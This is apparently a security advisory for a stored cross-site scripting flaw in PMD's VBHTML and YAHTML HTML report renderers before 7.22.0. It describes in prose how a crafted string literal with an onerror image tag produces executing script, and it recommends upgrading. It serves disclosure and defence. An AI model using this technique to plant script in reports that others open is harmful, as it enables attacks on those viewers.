PMD Stored Cross-Site Scripting Vulnerability in VBHTML and YAHTML Renderers

A stored cross-site scripting vulnerability has been identified in PMD's VBHTML and YAHTML report formats, prior to version 7.22.0. These formats insert rule violation messages into the HTML output without proper escaping. When PMD analyzes untrusted source code with crafted string literals, the resulting HTML report can contain executable JavaScript that runs in the browser. This issue arises because the VBHTML and YAHTML renderers append violation descriptions directly into the HTML, leaving them vulnerable to injection. Although the default HTML format is not affected, it does have a similar problem with suppressed violation messages, which can also lead to unescaped content being rendered.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected JavaScript is executed in the context of the user viewing the report in a browser. This could be exploited by opening the generated report HTML file, which would trigger the execution of the embedded JavaScript.

Reproduction

To reproduce this vulnerability, create a Java file with duplicate string literals containing an HTML payload, such as an image tag with an `onerror` event. Then, run PMD with the `vbhtml` format on this file. The resulting report will execute a JavaScript alert when opened in a browser, demonstrating the cross-site scripting vulnerability.

Remediation

Users are advised to upgrade to PMD version 7.22.0 or later, where this vulnerability has been fixed.